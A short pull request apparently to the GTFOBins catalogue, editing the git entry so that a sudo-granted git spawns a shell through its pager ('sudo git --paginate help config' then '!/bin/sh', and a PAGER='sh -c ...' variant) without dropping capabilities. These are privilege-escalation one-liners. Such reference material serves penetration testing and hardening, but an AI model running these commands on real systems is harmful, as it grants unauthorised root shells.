### PR TITLE
Updating git sudo to not drop capabilities

### DIFF
--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -8,9 +8,9 @@ functions:
         !/bin/sh
   sudo:
     - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
-    - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. Several capabilities might be dropped in the child process using this method.
+    - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
       code: |
-        sudo git help config
+        sudo git --paginate help config
         !/bin/sh
   limited-suid:
     - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help


### PR DESCRIPTION
Apparently, at least in my machine, which has `Ubuntu 18.04.2 LTS`, if you add the `--paginate` option the capabilities are not dropped.

This is better than the one currently proposed, that drops most capabilities.